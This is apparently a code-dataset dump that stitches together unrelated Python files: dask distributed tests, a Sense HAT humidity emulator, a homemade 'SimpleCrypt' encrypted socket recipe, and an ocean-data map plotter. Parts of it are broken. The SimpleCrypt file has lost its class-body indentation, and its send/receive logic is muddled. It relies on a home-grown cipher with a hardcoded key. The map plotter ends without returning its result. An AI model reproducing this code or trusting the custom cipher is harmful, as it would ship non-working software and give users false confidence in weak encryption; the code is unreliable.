        assert_worker_story(story, [("foo", "nomatch")])
    with pytest.raises(AssertionError):
        assert_worker_story(story, [("baz",)])
    with pytest.raises(AssertionError):
        assert_worker_story(story, [("baz", {1: 3})])
    with pytest.raises(AssertionError):
        assert_worker_story(story, [("foo",), ("bar",), ("baz", "extra"), ("+1",)])
    assert_worker_story([], [])
    assert_worker_story([("foo", "id1", now)], [("foo",)])
    with pytest.raises(AssertionError):
        assert_worker_story([], [("foo",)])

    # strict=True
    assert_worker_story([], [], strict=True)
    assert_worker_story([("foo", "id1", now)], [("foo",)])
    assert_worker_story(story, [("foo",), ("bar",), ("baz", {1: 2})], strict=True)
    with pytest.raises(AssertionError):
        assert_worker_story(story, [("foo",), ("bar",)], strict=True)
    with pytest.raises(AssertionError):
        assert_worker_story(story, [("foo",), ("baz", {1: 2})], strict=True)
    with pytest.raises(AssertionError):
        assert_worker_story(story, [], strict=True)
# Each parametrized story below violates the (payload, stimulus_id, ts)
# event shape in a different way and must be rejected as malformed.
@pytest.mark.parametrize(
    "story",
    [
        [()],  # Missing payload, stimulus_id, ts
        [("foo",)],  # Missing (stimulus_id, ts)
        [("foo", "bar")],  # Missing ts
        [("foo", "bar", "baz")],  # ts is not a float
        [("foo", "bar", time() + 3600)],  # ts is in the future
        [("foo", "bar", time() - 7200)],  # ts is too old
        [("foo", 123, time())],  # stimulus_id is not a string
        [("foo", "", time())],  # stimulus_id is an empty string
        [("", time())],  # no payload
        [("foo", "id", time()), ("foo", "id", time() - 10)],  # timestamps out of order
    ],
)
def test_assert_worker_story_malformed_story(story):
    with pytest.raises(AssertionError, match="Malformed story event"):
        assert_worker_story(story, [])
@gen_cluster()
async def test_dump_cluster_state(s, a, b, tmpdir):
    # The dump must always contain scheduler, workers and versions sections.
    await dump_cluster_state(s, [a, b], str(tmpdir), "dump")
    with open(f"{tmpdir}/dump.yaml") as fh:
        out = yaml.safe_load(fh)

    assert out.keys() == {"scheduler", "workers", "versions"}
    assert out["workers"].keys() == {a.address, b.address}


@gen_cluster(nthreads=[])
async def test_dump_cluster_state_no_workers(s, tmpdir):
    # A worker-less cluster still produces a dump with an empty workers map.
    await dump_cluster_state(s, [], str(tmpdir), "dump")
    with open(f"{tmpdir}/dump.yaml") as fh:
        out = yaml.safe_load(fh)

    assert out.keys() == {"scheduler", "workers", "versions"}
    assert out["workers"] == {}


@gen_cluster(Worker=Nanny)
async def test_dump_cluster_state_nannies(s, a, b, tmpdir):
    # With nannies, the dump keys are the worker (not nanny) addresses.
    await dump_cluster_state(s, [a, b], str(tmpdir), "dump")
    with open(f"{tmpdir}/dump.yaml") as fh:
        out = yaml.safe_load(fh)

    assert out.keys() == {"scheduler", "workers", "versions"}
    assert out["workers"].keys() == s.workers.keys()


@gen_cluster()
async def test_dump_cluster_state_unresponsive_local_worker(s, a, b, tmpdir):
    # A stopped in-process worker must still be represented in the dump.
    a.stop()
    await dump_cluster_state(s, [a, b], str(tmpdir), "dump")
    with open(f"{tmpdir}/dump.yaml") as fh:
        out = yaml.safe_load(fh)

    assert out.keys() == {"scheduler", "workers", "versions"}
    assert isinstance(out["workers"][a.address], dict)
    assert isinstance(out["workers"][b.address], dict)


@pytest.mark.slow
@gen_cluster(
    client=True,
    Worker=Nanny,
    config={"distributed.comm.timeouts.connect": "200ms"},
)
async def test_dump_cluster_unresponsive_remote_worker(c, s, a, b, tmpdir):
    # Clog one remote worker's event loop; its dump entry degrades to an
    # error string while the healthy worker still dumps a full dict.
    addr1, addr2 = s.workers
    clog_fut = asyncio.create_task(
        c.run(lambda dask_scheduler: dask_scheduler.stop(), workers=[addr1])
    )
    await asyncio.sleep(0.2)

    await dump_cluster_state(s, [a, b], str(tmpdir), "dump")
    with open(f"{tmpdir}/dump.yaml") as fh:
        out = yaml.safe_load(fh)

    assert out.keys() == {"scheduler", "workers", "versions"}
    assert isinstance(out["workers"][addr2], dict)
    assert out["workers"][addr1].startswith("OSError('Timed out trying to connect to")

    clog_fut.cancel()
|
humidity.py | # vim: set et sw=4 sts=4 fileencoding=utf-8:
#
# Raspberry Pi Sense HAT Emulator library for the Raspberry Pi
# Copyright (c) 2016 Raspberry Pi Foundation <info@raspberrypi.org>
#
# This package is free software; you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the Free
# Software Foundation; either version 2.1 of the License, or (at your option)
# any later version.
#
# This package is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>
from __future__ import (
unicode_literals,
absolute_import,
print_function,
division,
)
# Py2/Py3 compatibility shim: keep the native string type around as `nstr`
# (struct format strings must be native str on Py2) and rebind `str` to the
# unicode text type on both versions.
nstr = str
str = type('')
import sys
import os
import io
import mmap
import errno
from struct import Struct
from collections import namedtuple
from random import Random
from time import time
from threading import Thread, Event
from math import isnan
import numpy as np
from .common import clamp
# See HTS221 data-sheet for details of register values
# Fixed-point scale factors: readings are stored in the register file as
# value * FACTOR integers.
HUMIDITY_FACTOR = 256
TEMP_FACTOR = 64
# Binary layout of the emulated sensor's shared register file (the mmap'd
# file created by init_humidity below).
HUMIDITY_DATA = Struct(nstr(
    '@'   # native mode
    'B'   # humidity sensor type
    '6p'  # humidity sensor name
    'B'   # H0
    'B'   # H1
    'H'   # T0
    'H'   # T1
    'h'   # H0_OUT
    'h'   # H1_OUT
    'h'   # T0_OUT
    'h'   # T1_OUT
    'h'   # H_OUT
    'h'   # T_OUT
    'B'   # H_VALID
    'B'   # T_VALID
    ))
# Named, field-by-field view over the packed structure above.
HumidityData = namedtuple('HumidityData', (
    'type', 'name', 'H0', 'H1', 'T0', 'T1', 'H0_OUT', 'H1_OUT',
    'T0_OUT', 'T1_OUT', 'H_OUT', 'T_OUT', 'H_VALID', 'T_VALID')
    )
def humidity_filename():
    """
    Return the filename used to represent the state of the emulated sense
    HAT's humidity sensor. On UNIX we try ``/dev/shm`` then fall back to
    ``/tmp``; on Windows we use whatever ``%TEMP%`` contains.
    """
    fname = 'rpi-sense-emu-humidity'
    if sys.platform.startswith('win'):
        # Just use a temporary file on Windows.
        return os.path.join(os.environ['TEMP'], fname)
    if os.path.exists('/dev/shm'):
        return os.path.join('/dev/shm', fname)
    return os.path.join('/tmp', fname)
def init_humidity():
    """
    Open the file representing the state of the humidity sensor and return
    the file-like object.

    If the file already exists it is simply resized to the register-map
    size; otherwise it is created and zero-filled.
    """
    try:
        # Open the existing sensor file and force it to the right size.
        fd = io.open(humidity_filename(), 'r+b', buffering=0)
        fd.seek(HUMIDITY_DATA.size)
        fd.truncate()
        return fd
    except IOError as e:
        # Anything other than "file does not exist" is a real error.
        if e.errno != errno.ENOENT:
            raise
    # First run: create the file and zero the whole register map.
    fd = io.open(humidity_filename(), 'w+b', buffering=0)
    fd.write(b'\x00' * HUMIDITY_DATA.size)
    return fd
class HumidityServer(object):
    """
    Emulated HTS221 humidity/temperature sensor backed by a memory-mapped
    register file, optionally perturbed by gaussian noise from a background
    thread so readings behave like real hardware.
    """

    def __init__(self, simulate_noise=True):
        self._random = Random()
        self._fd = init_humidity()
        self._map = mmap.mmap(self._fd.fileno(), 0, access=mmap.ACCESS_WRITE)
        data = self._read()
        if data.type != 2:
            # Fresh backing file: write HTS221 identification plus default
            # calibration values, then start from nominal readings.
            self._write(HumidityData(2, b'HTS221', 0, 100, 0, 100, 0, 25600, 0, 6400, 0, 0, 0, 0))
            self._humidity = 45.0
            self._temperature = 20.0
        else:
            # Existing file: recover the last readings from the registers.
            self._humidity = data.H_OUT / HUMIDITY_FACTOR
            self._temperature = data.T_OUT / TEMP_FACTOR
        self._noise_thread = None
        self._noise_event = Event()
        self._noise_write()
        # The queue lengths are selected to accurately represent the response
        # time of the sensors.
        # BUG FIX: np.float was deprecated in NumPy 1.20 and later removed;
        # the builtin float is the type it aliased.
        self._humidities = np.full((10,), self._humidity, dtype=float)
        self._temperatures = np.full((31,), self._temperature, dtype=float)
        self.simulate_noise = simulate_noise

    def close(self):
        # Idempotent: stop the noise thread, then release the map and file.
        if self._fd:
            self.simulate_noise = False
            self._map.close()
            self._fd.close()
            self._fd = None
            self._map = None

    def _perturb(self, value, error):
        """
        Return *value* perturbed by +/- *error* which is derived from a
        gaussian random generator.
        """
        # We use an internal Random() instance here to avoid a threading issue
        # with the gaussian generator (could use locks, but an instance of
        # Random is easier and faster)
        return value + self._random.gauss(0, 0.2) * error

    def _read(self):
        # Unpack the current register contents into a HumidityData tuple.
        return HumidityData(*HUMIDITY_DATA.unpack_from(self._map))

    def _write(self, value):
        # Pack *value* back into the memory-mapped register file.
        HUMIDITY_DATA.pack_into(self._map, 0, *value)

    @property
    def humidity(self):
        # Target humidity (%RH) before noise is applied.
        return self._humidity

    @property
    def temperature(self):
        # Target temperature (degrees C) before noise is applied.
        return self._temperature

    def set_values(self, humidity, temperature):
        """Set the target readings; with noise disabled, write them through
        to the register file immediately."""
        self._humidity = humidity
        self._temperature = temperature
        if not self._noise_thread:
            self._noise_write()

    @property
    def simulate_noise(self):
        # Noise simulation is "on" exactly while the background thread runs.
        return self._noise_thread is not None

    @simulate_noise.setter
    def simulate_noise(self, value):
        if value and not self._noise_thread:
            self._noise_event.clear()
            self._noise_thread = Thread(target=self._noise_loop)
            self._noise_thread.daemon = True
            self._noise_thread.start()
        elif self._noise_thread and not value:
            self._noise_event.set()
            self._noise_thread.join()
            self._noise_thread = None
            # Write the exact (noise-free) values once the thread is gone.
            self._noise_write()

    def _noise_loop(self):
        # Refresh the registers every 130ms until told to stop.
        while not self._noise_event.wait(0.13):
            self._noise_write()

    def _noise_write(self):
        if self.simulate_noise:
            # Shift the sliding windows and push a freshly perturbed sample;
            # the error bound widens outside the sensor's accurate range.
            self._humidities[1:] = self._humidities[:-1]
            self._humidities[0] = self._perturb(self.humidity, (
                3.5 if 20 <= self.humidity <= 80 else
                5.0))
            self._temperatures[1:] = self._temperatures[:-1]
            self._temperatures[0] = self._perturb(self.temperature, (
                0.5 if 15 <= self.temperature <= 40 else
                1.0 if 0 <= self.temperature <= 60 else
                2.0))
            humidity = self._humidities.mean()
            temperature = self._temperatures.mean()
        else:
            humidity = self.humidity
            temperature = self.temperature
        # NaN marks "no reading": clear the valid flags and zero the outputs.
        self._write(self._read()._replace(
            H_VALID=not isnan(humidity),
            T_VALID=not isnan(temperature),
            H_OUT=0 if isnan(humidity) else int(clamp(humidity, 0, 100) * HUMIDITY_FACTOR),
            T_OUT=0 if isnan(temperature) else int(clamp(temperature, -40, 120) * TEMP_FACTOR),
        ))
|
recipe-577212.py | import time, hashlib, base64
from array import array
from SimpleCrypt import SimpleCrypt
"""
SimpleCryptSocketExt
Author: AJ Mayorga
Date: 4/30/2010
Having posted SimpleCrypt http://code.activestate.com/recipes/577174/ I wanted
to follow with an implementation example, specifically for use in Client/Server
solutions and keep it simple and as close to a drop-in solution as possible.
Design Goals:
- Create a generic SimpleCrypt wrapper for use in solutions such as:
- HTTP,RAW,FTP,DNS,etc
- Support TCP or UDP
- Internal checking of data integrity and error recovery
- Demonstrate various implementations for SALTing encrypted data streams
- SimpleCrypt allows for not only SALTing key values
but algorithm configuration as well
Enjoy, as always feedback welcome
"""
class SimpleCryptSocketExt(SimpleCrypt):
def __init__(self, kwargs):
    # NOTE(review): takes a settings dict *positionally* and expands it into
    # the SimpleCrypt constructor -- callers pass a dict, not keywords.
    SimpleCrypt.__init__(self, **kwargs)
    self.name = str(self.__class__).split(".")[1]
    # Seed words rotated through by SimpleSalt().
    self.SeedValues = ["Iliana", "Chandra", "Elspeth", "Sorrin", "Bob"]
    # Hash of the most recent plaintext, used by PreviousDataSalt().
    self.SeedData = ""
    # One of: None, "Simple", "NTP", "PrevData" (see _Salt()).
    self.salt_method = None
    # Rotating index into SeedValues.
    self.idx = 0
    # Evolving counter mixed into every salt.
    self.Counter = 0
    self.Debug = False
    self.Errors = 0
    self.MaxRetries = 3
    self.HMAC = ""
    # Marker appended to mark the end of a transmitted block.
    self.BlockEndMarker = "ZZ"
def Encode(self, data, mode="Hex"):
    # Encode binary data for transport as hex or base64.
    # NOTE(review): the 'hex' codec is Python 2 only (binascii.hexlify on Py3).
    if mode == "Hex":
        return data.encode('hex')
    elif mode == "B64":
        return base64.b64encode(data)
def Decode(self, data, mode="Hex"):
    # Inverse of Encode(): recover binary data from hex or base64 text.
    # NOTE(review): the 'hex' codec is Python 2 only (binascii.unhexlify on Py3).
    if mode == "Hex":
        return data.decode('hex')
    elif mode == "B64":
        return base64.b64decode(data)
def ShowInitVars(self, label):
    # Debug dump of the current cipher configuration; *label* should contain
    # "ENCRYPT" or "DECRYPT" to select which key schedule to print.
    # (Python 2 print statements -- this file is Py2 code.)
    label = label.upper()
    print "\n", "#"*80, "\n"
    print label, " Key: ", self.key.encode('hex')
    print label, " Cycles: ", self.cycles
    print label, " BlockSz: ", self.block_sz
    print label, " KeyAdv: ", self.key_advance
    print label, " KeyMag: ", self.key_magnitude
    print label, " SeedData: ", self.Encode(self.SeedData), "\n"
    if label.find("ENCRYPT") != -1:
        for idx in range(len(self.eKeys)):
            print label, " eKey", idx, ": ", self.eKeys[idx].tostring().encode('hex')
    elif label.find("DECRYPT") != -1:
        for idx in range(len(self.dKeys)):
            print label, " dKey", idx, ": ", self.dKeys[idx].tostring().encode('hex')
    print label, " HMAC : ", self.HMAC
    print "\n", "#"*80, "\n"
def SimpleSalt(self):
    """
    Salt the SimpleCrypt vars according to preset seed values and preset
    routines; over time this implementation can prove predictable.
    """
    # Rotate through SeedValues, wrapping at the end.
    self.idx = (self.idx+1, 0)[self.idx >= len(self.SeedValues)-1]
    key = self.key + self.SeedValues[self.idx] + str(self.Counter)
    ARGS = dict()
    # BUG FIX: bare `sha1` was undefined -- only the hashlib module is
    # imported by this file.
    ARGS['Key'] = hashlib.sha1(key).digest()
    self.Counter += 21 + len(self.SeedValues[self.idx])
    self.ReInit(ARGS)
def NTPSalt(self):
    """
    Salt the SimpleCrypt vars according to time values; this demo changes
    keys every minute, for every day of the year. Works really well, but
    only if you have a good NTP setup.
    """
    year, month, day, hour, minute, sec, wday, yday, dst = time.localtime()
    ARGS = dict()
    # BUG FIX: the original used the builtin `min` where the unpacked
    # `minute` field was intended, both in the key string and in the
    # Counter update below (the latter raised a TypeError at runtime).
    ARGS['Key'] = ''.join([str(x) for x in (self.key, year, month, day, hour, minute)])
    ARGS['Cycles'] = max(wday + 1, 3)
    ARGS['BlockSz'] = month * 128
    ARGS['KeyAdv'] = yday
    ARGS['KeyMag'] = min(int(ARGS['Cycles'] / 2) + 1, ARGS['Cycles'])
    self.Counter += 21 + sec + yday - minute
    self.ReInit(ARGS)
def PreviousDataSalt(self):
    """
    Salt the SimpleCrypt vars using previous data; this is definitely the
    most ideal way (IMHO).
    """
    # BUG FIX: bare `sha1` was undefined -- only the hashlib module is
    # imported by this file.
    SeedHash = hashlib.sha1(self.SeedData).hexdigest()
    idx = 2
    # Pull bytes from varying offsets of the previous-data hash.
    # NOTE(review): .decode('hex') is Python 2 only (binascii.unhexlify on Py3).
    v1 = ord(SeedHash[idx-2:idx].decode('hex')); idx += 10
    v2 = ord(SeedHash[idx-2:idx].decode('hex')); idx += 2
    v3 = ord(SeedHash[idx-2:idx].decode('hex')); idx += 1
    v4 = ord(SeedHash[idx-2:idx].decode('hex')); idx += 15
    v5 = ord(SeedHash[idx-2:idx].decode('hex')); idx += 3
    key = self.key + str(self.Counter)
    ARGS = dict()
    ARGS['Key'] = hashlib.sha1(''.join([str(x) for x in (v1, v2, v3)])).digest()
    ARGS['Cycles'] = min(6, v1)
    ARGS['BlockSz'] = max(128, v2)
    ARGS['KeyAdv'] = v4
    ARGS['KeyMag'] = min(int(ARGS['Cycles'] / 2) + 1, ARGS['Cycles'])
    self.Counter += 16 * (v1 * 4) - (v3 * 5)
    self.ReInit(ARGS)
def _Salt(self):
if self.salt_method == "Simple":
self.SimpleSalt()
elif self.salt_method == "NTP":
self.NTPSalt()
elif self.salt_method == "PrevData":
self.PreviousDataSalt()
elif self.salt_method == None:
return
else:
print "Salt Method Invalid Choose Simple, NTP, PrevData"
"""
Method to override SimpleCrypt Encrypt method so we can
make it more refined for sockets
"""
def Encrypt(self, plain):
if self.Debug:
print "\n\n",self.name," Encrypting :",plain
self.ShowInitVars("ENCRYPT")
data = array('B', plain)
for cycle in range(self.cycles):
params = ("Encrypt", cycle)
data = self.Cycle(self.SetDataVector(data, params), params)
ret = data.tostring()
if self.Debug:
print "Cipher: ",ret.encode('hex')
self.SeedData = self.MShaHex(plain)
self.HMAC = self.GenHMAC(ret)
self._Salt()
return ret
"""
override SimpleCrypt Decrypt
"""
def Decrypt(self, data):
if self.Debug:
print "\n\n",self.name," Decrypting :",self.Encode(data)
self.ShowInitVars("DECRYPT")
data = array('B', data)
for cycle in range(self.cycles):
params = ("Decrypt", cycle)
data = self.SetDataVector(self.Cycle(data, params), params)
ret = data.tostring()
if self.Debug:
print "Plain: ",ret
self.SeedData = self.MShaHex(ret)
self._Salt()
return ret
"""
method to handle receiving blocks of cipher data through
the passed in socket Object, also checks HMAC
to ensure data arrived unaltered, bad HMAC prompts
for resend up to MaxRetries
"""
def RecvData(self, socketObject):
ret = False
data = socketObject.recv(1024)
data = self.Decode(data)
dataHash = self.GenHMAC(data)
if data.find(self.BlockEndMarker) == -1 or len(data) > 2:
data = self.Decrypt(data)
else:
dataHash = self.GenHMAC(data)
socketObject.send(dataHash)
response = socketObject.recv(1024)
if response == dataHash:
ret = data
self.Errors = 0
else:
self.Errors += 1
return ret
"""
handles sending blocks of cipher data confirms receipt via HMAC &
resend if necessary
"""
def SendData(self, socketObject, data):
ret = False
dataHash = self.HMAC
socketObject.send(self.Encode(data))
response = socketObject.recv(1024)
while self.Errors <= self.MaxRetries:
if response == dataHash:
socketObject.send(dataHash)
ret = True
break
else:
print "BAD HMAC:",response," EXPECTING: ",dataHash
socketObject.send(data)
response = socketObject.recv(1024)
self.Errors += 1
continue
self.Errors = 0
print "SENT: ",dataHash," RECV: ",response
return ret
"""
Handles receiving messages and reassembles them block by block
from RecvData
"""
def DataInBound(self, socketObject):
self.InBoundData = ''
while True:
data = self.RecvData(socketObject)
if data == False:
continue
if data.find(self.BlockEndMarker) != -1:
data = data.replace(self.BlockEndMarker,"")
if len(data) > 1:
self.InBoundData += data
break
else:
self.InBoundData += data
return True
"""
Disassembles messages and sends them via SendData
"""
def DataOutBound(self, socketObject):
ret = False
for CipherBlock in self.EncryptBlock(self.OutBoundData):
self.SendData(socketObject, CipherBlock)
self.HMAC = self.GenHMAC(self.BlockEndMarker)
self.SendData(socketObject, self.BlockEndMarker)
self.OutBoundData = ''
return True
#######################################################################################
#######################################################################################
import socket, SocketServer, threading
#######################################################################################
# A class that holds some functionality we will call from the Client
class MyFunctionalClass:
    """Stand-in application logic exercised over the encrypted channel."""

    def __init__(self):
        # Canned lorem-ipsum payload returned for recognised requests.
        self.text = (
            "\nLorem ipsum dolor sit amet, consectetur adipisicing elit, sed do\n"
            "eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut\n"
            "enim ad minim veniam, quis nostrud exercitation ullamco laboris\n"
            "nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor\n"
            "in reprehenderit in voluptate velit esse cillum dolore eu fugiat\n"
            "nulla pariatur. Excepteur sint occaecat cupidatat non proident,\n"
            "sunt in culpa qui officia deserunt mollit anim id est laborum.\n"
        )

    def Parse(self, msg):
        """Return the canned text when msg contains "Greetings", else None."""
        if "Greetings" in msg:
            return self.text
######################################################################################
######################################################################################
#Configuration class subclassing SimpleCryptSocketExt with the necessary
#vars; both the Server and the Client need a copy of this.
class SocketCrypto(SimpleCryptSocketExt):
    # Shared crypto configuration: client and server construct this with
    # identical parameters so their cipher states start out in sync.
    def __init__(self):
        self.CryptoArgs = dict()
        self.CryptoArgs['INITKEY'] = "My initial key"  # initial shared key
        self.CryptoArgs['DEBUG'] = False
        self.CryptoArgs['CYCLES'] = 3        # cipher rounds per block
        self.CryptoArgs['BLOCK_SZ'] = 20     # bytes per cipher block
        self.CryptoArgs['KEY_ADV'] = 5
        self.CryptoArgs['KEY_MAGNITUDE'] = 1
        SimpleCryptSocketExt.__init__(self, self.CryptoArgs)
        self.InBoundData = ""
        self.OutBoundData = ""
        # Re-keying is disabled by default; uncomment one to enable a
        # salt strategy (see SimpleSalt / NTPSalt / PreviousDataSalt).
        #self.salt_method = "Simple"
        #self.salt_method = "NTP"
        #self.salt_method = "PrevData"
#####################################################################################
#####################################################################################
#Class to handle Server coms overriding BaseRequestHandler handle method
class ThreadedTCPRequestHandler(SocketServer.BaseRequestHandler, SocketCrypto):
    # One instance is created per connection by the threading TCP server;
    # handle() runs in its own thread.
    def handle(self):
        # Class name without the module prefix, used in debug output.
        self.name = str(self.__class__).split(".")[1]
        SocketCrypto.__init__(self)  # fresh cipher state for every connection
        self.Debug = True
        MyFuncClass = MyFunctionalClass()
        socketObject = self.request
        # Receive the full (encrypted) request, produce a reply via the
        # application logic, and send it back over the same socket.
        if self.DataInBound(socketObject):
            print "SERVER RECEIVED :",self.InBoundData
            self.OutBoundData = MyFuncClass.Parse(self.InBoundData)
            if self.DataOutBound(socketObject):
                print "\nTranfer Success!"
            else:
                print "\nERROR SENDING REPLY TO SENDER"
        else:
            print "\nERROR RECEIVING SENDER DATA"
        self.ShowInitVars("SERVER")
####################################################################################
####################################################################################
#Multithreading TCP Server
class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
    # ThreadingMixIn makes each accepted connection run its handler in a
    # separate thread; no extra behaviour is needed here.
    pass
####################################################################################
####################################################################################
####################################################################################
# Example Client Class Subclassing SocketCrypto
class MyClient(SocketCrypto):
    # Example client: opens a fresh TCP connection (and resets cipher state)
    # for every message it sends.
    def __init__(self, Server, Port):
        SocketCrypto.__init__(self)
        self.name = str(self.__class__).split(".")[1]  # for debug output
        self.Server = Server
        self.Port = Port
        self.Debug = True
    def CallServer(self, Messages):
        # Send each message on its own connection.  Returns an empty string;
        # replies are printed rather than collected.
        ret = ""
        for idx in range(0,len(Messages)):
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.connect((self.Server, self.Port))
            if self.MessagePump(Messages[idx], sock):
                print "Client Call#",idx," Received: ",self.InBoundData,"\n"
            else:
                print "Error Sending Message To Server"
            sock.close()
            # Reset cipher state so the next connection starts in sync with
            # the server's fresh per-connection state.
            SocketCrypto.__init__(self)
        return ret
    def MessagePump(self, Message, socketObject):
        # Send one message and wait for the reply; True on success.
        ret = False
        self.OutBoundData = Message
        if self.DataOutBound(socketObject):
            if self.DataInBound(socketObject):
                print "\nCLIENT RECV: ",self.InBoundData
                ret = True
        self.ShowInitVars("CLIENT")
        return ret
####################################################################################
####################################################################################
if __name__ == '__main__':
    # Demo: start a threaded server on an ephemeral port, then drive it with
    # three client calls over the encrypted channel.
    HOST, PORT = "localhost", 0  # port 0: let the OS pick a free port
    server = ThreadedTCPServer((HOST, PORT), ThreadedTCPRequestHandler)
    server_thread = threading.Thread(target=server.serve_forever)
    server_thread.setDaemon(True)  # don't keep the interpreter alive on exit
    server_thread.start()
    ip, port = server.server_address
    client = MyClient(ip, port)
    messages = ["Greetings","Greetings","Greetings"]
    client.CallServer(messages)
    server.shutdown()
|
mapplot.py | # Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import string
from cStringIO import StringIO
from multiprocessing import Process, Manager
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
from mpl_toolkits.basemap import Basemap
import BaseDomsHandler
import ResultsStorage
matplotlib.use('Agg')
# Maps the short query parameter name to the field name used in stored results.
PARAMETER_TO_FIELD = {
    "sst": "sea_water_temperature",
    "sss": "sea_water_salinity"
}
# Colorbar unit labels (matplotlib mathtext) keyed by parameter name.
PARAMETER_TO_UNITS = {
    "sst": "($^\circ$ C)",
    "sss": "(g/L)"
}
def __square(minLon, maxLon, minLat, maxLat):
    """Symmetrically widen the narrower axis so the bounding box is square.

    Returns the (possibly adjusted) minLon, maxLon, minLat, maxLat; the box
    is returned unchanged when the two spans are already equal.
    """
    lat_span = maxLat - minLat
    lon_span = maxLon - minLon
    if lat_span > lon_span:
        pad = (lat_span - lon_span) / 2.0
        minLon, maxLon = minLon - pad, maxLon + pad
    elif lon_span > lat_span:
        pad = (lon_span - lat_span) / 2.0
        minLat, maxLat = minLat - pad, maxLat + pad
    return minLon, maxLon, minLat, maxLat
def render(d, lats, lons, z, primary, secondary, parameter):
    """Render a scatter map of primary-vs-secondary differences as a PNG.

    d -- dict-like or None; when given, the PNG bytes are stored under
         'plot' (used by renderAsync to pass the image across processes).
    lats, lons -- point coordinates.
    z -- difference values; NaNs are masked out.
    primary, secondary -- dataset names, used for the plot title.
    parameter -- 'sst' or 'sss'; selects colorbar units (defaults to sst).

    Returns the PNG image as a byte string.
    """
    fig = plt.figure()
    ax = fig.add_axes([0.1, 0.1, 0.8, 0.8])
    ax.set_title(string.upper("%s vs. %s" % (primary, secondary)))
    # Pad the data extent by 10% on each side, then square it up so the
    # map projection is not overly stretched.
    minLatA = np.min(lats)
    maxLatA = np.max(lats)
    minLonA = np.min(lons)
    maxLonA = np.max(lons)
    minLat = minLatA - (abs(maxLatA - minLatA) * 0.1)
    maxLat = maxLatA + (abs(maxLatA - minLatA) * 0.1)
    minLon = minLonA - (abs(maxLonA - minLonA) * 0.1)
    maxLon = maxLonA + (abs(maxLonA - minLonA) * 0.1)
    minLon, maxLon, minLat, maxLat = __square(minLon, maxLon, minLat, maxLat)
    m = Basemap(projection='mill', llcrnrlon=minLon, llcrnrlat=minLat, urcrnrlon=maxLon, urcrnrlat=maxLat,
                resolution='l')
    m.drawparallels(np.arange(minLat, maxLat, (maxLat - minLat) / 5.0), labels=[1, 0, 0, 0], fontsize=10)
    m.drawmeridians(np.arange(minLon, maxLon, (maxLon - minLon) / 5.0), labels=[0, 0, 0, 1], fontsize=10)
    m.drawcoastlines()
    m.drawmapboundary(fill_color='#99ffff')
    m.fillcontinents(color='#cc9966', lake_color='#99ffff')
    masked_array = np.ma.array(z, mask=np.isnan(z))
    z = masked_array
    # Scale marker sizes linearly into [10, 30].  The min/max are hoisted
    # out of the loop -- the original recomputed np.min(z)/np.max(z) for
    # every point, making this O(n^2).
    z_min = np.min(z)
    z_range = np.max(z) - z_min
    values = np.zeros(len(z))
    for i in range(0, len(z)):
        values[i] = ((z[i] - z_min) / z_range * 20.0) + 10
    x, y = m(lons, lats)
    im1 = m.scatter(x, y, values)
    im1.set_array(z)
    cb = m.colorbar(im1)
    units = PARAMETER_TO_UNITS[parameter] if parameter in PARAMETER_TO_UNITS else PARAMETER_TO_UNITS["sst"]
    cb.set_label("Difference %s" % units)
    sio = StringIO()
    plt.savefig(sio, format='png')
    plot = sio.getvalue()
    if d is not None:
        d['plot'] = plot
    return plot
class DomsMapPlotQueryResults(BaseDomsHandler.DomsQueryResults):
    """Query-result wrapper that carries a pre-rendered map-plot PNG."""

    def __init__(self, lats, lons, z, parameter, primary, secondary, args=None, bounds=None, count=None, details=None,
                 computeOptions=None, executionId=None, plot=None):
        # The raw match-up points are exposed through the base-class results
        # dict; the rendered PNG bytes are kept privately for toImage().
        BaseDomsHandler.DomsQueryResults.__init__(self, results={"lats": lats, "lons": lons, "values": z}, args=args,
                                                  details=details, bounds=bounds, count=count,
                                                  computeOptions=computeOptions, executionId=executionId)
        self.__lats = lats
        self.__lons = lons
        self.__z = np.array(z)
        self.__parameter = parameter
        self.__primary = primary
        self.__secondary = secondary
        self.__plot = plot

    def toImage(self):
        # PNG produced at construction time (see createMapPlot/render).
        return self.__plot
def renderAsync(x, y, z, primary, secondary, parameter):
    """Run render() in a child process and return the PNG bytes.

    The image is handed back through a Manager dict, presumably to isolate
    matplotlib/Basemap global state from the serving process -- confirm
    before changing to an in-process call.
    """
    manager = Manager()
    d = manager.dict()
    p = Process(target=render, args=(d, x, y, z, primary, secondary, parameter))
    p.start()
    p.join()
    return d['plot']
def createMapPlot(id, parameter):
    """Fetch stored match-up results for execution `id` and build a map plot.

    For every (primary, matchup) pair two points are appended -- one at the
    primary measurement's location and one at the match's -- sharing the
    same difference value, so both ends of each match-up get drawn.  When
    the selected field is missing on either side the difference defaults
    to 1.0.  Note: `id` shadows the builtin (kept for interface stability).
    """
    with ResultsStorage.ResultsRetrieval() as storage:
        params, stats, data = storage.retrieveResults(id)
    primary = params["primary"]
    secondary = params["matchup"][0]
    lats = []
    lons = []
    z = []
    # Unknown parameters fall back to the sst field.
    field = PARAMETER_TO_FIELD[parameter] if parameter in PARAMETER_TO_FIELD else PARAMETER_TO_FIELD["sst"]
    for entry in data:
        for match in entry["matches"]:
            if match["source"] == secondary:
                if field in entry and field in match:
                    a = entry[field]
                    b = match[field]
                    z.append((a - b))
                    z.append((a - b))  # same value for both points of the pair
                else:
                    z.append(1.0)
                    z.append(1.0)
                lats.append(entry["y"])
                lons.append(entry["x"])
                lats.append(match["y"])
                lons.append(match["x"])
    plot = renderAsync(lats, lons, z, primary, secondary, parameter)
